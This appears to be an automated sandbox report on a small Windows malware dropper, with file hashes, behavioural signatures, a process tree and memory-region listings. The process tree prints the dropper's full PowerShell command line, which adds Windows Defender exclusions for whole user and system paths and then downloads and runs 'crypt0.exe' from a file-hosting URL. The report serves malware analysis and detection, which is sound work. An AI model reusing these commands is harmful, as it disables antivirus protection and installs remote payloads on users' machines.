Analysis

  • max time kernel
    152s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2024, 08:42

General

  • Target

    b85059c799ed760de71b3c35021d787c.exe

  • Size

    3KB

  • MD5

    b85059c799ed760de71b3c35021d787c

  • SHA1

    46daac66cfd1ace98efa557cc2b739a444dd76f4

  • SHA256

    2d8a407e8d61e977bd167a8505205437562c52ca60501af476d2e84180dc5132

  • SHA512

    bf70487924ef752f6bdf0b43de85fa35f5bb9d9170a575efc549c1d499a1f52b0edd00f4578f7a3252f3bb011e119c52eb82d1bd22a7696180612b9fc54bfe25

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://download1487.mediafire.com/y9nyrr6fzr5g/x4zfbcmgp29k79f/crypt0.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b85059c799ed760de71b3c35021d787c.exe
    "C:\Users\Admin\AppData\Local\Temp\b85059c799ed760de71b3c35021d787c.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3688
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('https://download1487.mediafire.com/y9nyrr6fzr5g/x4zfbcmgp29k79f/crypt0.exe', (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe')) & powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe') & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4748
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4900
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('https://download1487.mediafire.com/y9nyrr6fzr5g/x4zfbcmgp29k79f/crypt0.exe', (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe'))
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3224
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'crypt0.exe')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1048
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:4264

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      d4d8cef58818612769a698c291ca3b37

      SHA1

      54e0a6e0c08723157829cea009ec4fe30bea5c50

      SHA256

      98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

      SHA512

      f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      bc60ef9b16460d3c16888adf635e6f6f

      SHA1

      6403f4b0e6eb34d8252e53d90b52e00177063ba1

      SHA256

      c9f921e8dbe8065369471605a9cdc83f3cc1a217605cf17e5c37ae16b5b5fc6e

      SHA512

      1bcb067bb11291f89230da174adef86aca3378d5f5b66cbb752e69351fd0e27ae0006a21c536f5a160fe6a69f056c32c3a522f856e26a631a11505a10b6c3571

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      147f5be6faf9019237423928f0cf2e97

      SHA1

      7a64287c7b82414173a75ae684b5cf904563cc0b

      SHA256

      319a98d6b6368e21f9e5040639f6e0861ec43a743b779ff1962e1c7fe93afc32

      SHA512

      0f2cfe21178dc1b90e63eb051fdfd8960f6bd41cc1f4e8c5ad1ce8003c1d5284214b3e3031688cfca2fbc5acb03f1b249203c0024a771921689f5afcb7f92127

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      b3ef9b0728d9b021336e77304df9ade8

      SHA1

      60dc61953bdd01139038384413338af06386532d

      SHA256

      82c9ea5fd8237abd4bcbcbabc0c5ce408c1af5f1a4e731ecb7892527ecb608a6

      SHA512

      3eb516c1500970c91db578be488e20370712ba415612d7719e205df258582c0a6a1a746778d3ad61456480da6504eeca60c49fe485c7f263fb235a9d5fdb1834

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pke5aj55.o53.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1048-98-0x0000000002910000-0x0000000002920000-memory.dmp

      Filesize

      64KB

    • memory/1048-96-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/1048-97-0x0000000002910000-0x0000000002920000-memory.dmp

      Filesize

      64KB

    • memory/1048-111-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/3224-95-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/3224-93-0x0000000004BE0000-0x0000000004BF0000-memory.dmp

      Filesize

      64KB

    • memory/3224-92-0x0000000004BE0000-0x0000000004BF0000-memory.dmp

      Filesize

      64KB

    • memory/3224-91-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/3224-89-0x0000000008380000-0x0000000008924000-memory.dmp

      Filesize

      5.6MB

    • memory/3224-88-0x00000000070D0000-0x00000000070F2000-memory.dmp

      Filesize

      136KB

    • memory/3224-79-0x0000000005850000-0x0000000005BA4000-memory.dmp

      Filesize

      3.3MB

    • memory/3224-76-0x0000000004BE0000-0x0000000004BF0000-memory.dmp

      Filesize

      64KB

    • memory/3224-75-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/4748-21-0x000000007F0D0000-0x000000007F0E0000-memory.dmp

      Filesize

      64KB

    • memory/4748-18-0x0000000005A90000-0x0000000005AAE000-memory.dmp

      Filesize

      120KB

    • memory/4748-38-0x00000000070C0000-0x0000000007156000-memory.dmp

      Filesize

      600KB

    • memory/4748-39-0x0000000007030000-0x0000000007041000-memory.dmp

      Filesize

      68KB

    • memory/4748-40-0x0000000007070000-0x000000000707E000-memory.dmp

      Filesize

      56KB

    • memory/4748-41-0x0000000007080000-0x0000000007094000-memory.dmp

      Filesize

      80KB

    • memory/4748-42-0x0000000007160000-0x000000000717A000-memory.dmp

      Filesize

      104KB

    • memory/4748-43-0x00000000070B0000-0x00000000070B8000-memory.dmp

      Filesize

      32KB

    • memory/4748-46-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/4748-36-0x0000000006E30000-0x0000000006E4A000-memory.dmp

      Filesize

      104KB

    • memory/4748-1-0x00000000025A0000-0x00000000025B0000-memory.dmp

      Filesize

      64KB

    • memory/4748-2-0x0000000000CA0000-0x0000000000CD6000-memory.dmp

      Filesize

      216KB

    • memory/4748-3-0x00000000025A0000-0x00000000025B0000-memory.dmp

      Filesize

      64KB

    • memory/4748-4-0x0000000004C10000-0x0000000005238000-memory.dmp

      Filesize

      6.2MB

    • memory/4748-35-0x0000000007490000-0x0000000007B0A000-memory.dmp

      Filesize

      6.5MB

    • memory/4748-5-0x0000000004B60000-0x0000000004B82000-memory.dmp

      Filesize

      136KB

    • memory/4748-6-0x0000000005240000-0x00000000052A6000-memory.dmp

      Filesize

      408KB

    • memory/4748-7-0x00000000052B0000-0x0000000005316000-memory.dmp

      Filesize

      408KB

    • memory/4748-34-0x0000000006CF0000-0x0000000006D93000-memory.dmp

      Filesize

      652KB

    • memory/4748-33-0x0000000006040000-0x000000000605E000-memory.dmp

      Filesize

      120KB

    • memory/4748-23-0x0000000070DD0000-0x0000000070E1C000-memory.dmp

      Filesize

      304KB

    • memory/4748-22-0x0000000006060000-0x0000000006092000-memory.dmp

      Filesize

      200KB

    • memory/4748-0-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/4748-20-0x00000000025A0000-0x00000000025B0000-memory.dmp

      Filesize

      64KB

    • memory/4748-19-0x0000000005B60000-0x0000000005BAC000-memory.dmp

      Filesize

      304KB

    • memory/4748-37-0x0000000006EA0000-0x0000000006EAA000-memory.dmp

      Filesize

      40KB

    • memory/4748-13-0x00000000054E0000-0x0000000005834000-memory.dmp

      Filesize

      3.3MB

    • memory/4900-74-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB

    • memory/4900-63-0x0000000070DD0000-0x0000000070E1C000-memory.dmp

      Filesize

      304KB

    • memory/4900-62-0x0000000003160000-0x0000000003170000-memory.dmp

      Filesize

      64KB

    • memory/4900-60-0x0000000006190000-0x00000000064E4000-memory.dmp

      Filesize

      3.3MB

    • memory/4900-50-0x0000000003160000-0x0000000003170000-memory.dmp

      Filesize

      64KB

    • memory/4900-49-0x0000000003160000-0x0000000003170000-memory.dmp

      Filesize

      64KB

    • memory/4900-48-0x0000000074FB0000-0x0000000075760000-memory.dmp

      Filesize

      7.7MB